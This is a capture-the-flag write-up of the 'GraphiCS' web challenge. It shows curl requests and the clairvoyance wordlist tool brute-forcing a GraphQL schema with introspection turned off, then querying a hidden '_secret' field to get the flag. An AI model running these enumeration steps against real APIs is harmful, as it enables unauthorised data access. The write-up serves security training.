GraphiCS

Category: Web
150 points
Solved by JCTF Team

Description

problem description

Solution

The challenge website (https://graphics.chal.intentsummit.org)

website

In the sources tab of the chrome inspect we can see the static JS source of the react https://graphics.chal.intentsummit.org/static/js/index.js

import React from 'react';
import { render } from 'react-dom';
import {
  ApolloClient,
  InMemoryCache,
  ApolloProvider,
  useQuery,
  gql
} from "@apollo/client";

const client = new ApolloClient({
  uri: '/api/v1/',
  cache: new InMemoryCache()
});

const TALKS_DETAILS = gql`
query ExampleQuery {
  talks {
    time
    title
    speaker
  }
}

`;

...

In this source code we found path to graphQL API https://graphics.chal.intentsummit.org/api/v1/

api

We tried basic enumeration

jctf@jctf jctf % curl --request POST \
  --header 'content-type: application/json' \
  --url 'https://graphics.chal.intentsummit.org/api/v1/' \
  --data '{"query":"query {__schema{types{name,fields{name}}}}"}' --insecure
{"errors":[{"message":"GraphQL introspection is not allowed by Apollo Server, but the query contained __schema or __type. To enable introspection, pass introspection: true to ApolloServer in production","extensions":{"code":"GRAPHQL_VALIDATION_FAILED","exception":{"stacktrace":["GraphQLError: GraphQL introspection is not allowed by Apollo Server, but the query contained __schema or __type. To enable introspection, pass introspection: true to ApolloServer in production","    at Object.Field (/usr/src/app/node_modules/apollo-server/node_modules/apollo-server-core/dist/ApolloServer.js:27:33)","    at Object.enter (/usr/src/app/node_modules/graphql/language/visitor.js:323:29)","    at Object.enter (/usr/src/app/node_modules/graphql/utilities/TypeInfo.js:370:25)","    at visit (/usr/src/app/node_modules/graphql/language/visitor.js:243:26)","    at validate (/usr/src/app/node_modules/graphql/validation/validate.js:69:24)","    at validate (/usr/src/app/node_modules/apollo-server/node_modules/apollo-server-core/dist/requestPipeline.js:185:39)","    at processGraphQLRequest (/usr/src/app/node_modules/apollo-server/node_modules/apollo-server-core/dist/requestPipeline.js:90:34)","    at processTicksAndRejections (node:internal/process/task_queues:96:5)","    at async processHTTPRequest (/usr/src/app/node_modules/apollo-server/node_modules/apollo-server-core/dist/runHttpQuery.js:187:30)"]}}}]}

Inspection is disabled in this server so we found some python script that produce the schema by iterating over word dictionary https://github.com/nikitastupin/clairvoyance with this word dictionary https://github.com/first20hours/google-10000-english

python3 -m clairvoyance -k -o schema.json -w google-10000-english-master/google-10000-english.txt https://graphics.chal.intentsummit.org/api/v1/

In the schema.json we found object named secrets with field named flag

...

{
   "description": null,
   "enumValues": null,
   "fields": [
      {
            "args": [],
            "deprecationReason": null,
            "description": null,
            "isDeprecated": false,
            "name": "flag",
            "type": {
               "kind": "SCALAR",
               "name": "String",
               "ofType": null
            }
      }
   ],
   "inputFields": null,
   "interfaces": [],
   "kind": "OBJECT",
   "name": "Secret",
   "possibleTypes": null
}

...

We query this field

jctf@jctf jctf % curl --request POST \
  --header 'content-type: application/json' \
  --url 'https://graphics.chal.intentsummit.org/api/v1/' \
  --data '{"query":"query {_secret{flag}}"}' --insecure
{"data":{"_secret":[{"flag":"INTENT{d1d_y0u_m34n_flag}"}]}}

We got the flag!

Flag: INTENT{d1d_y0u_m34n_flag}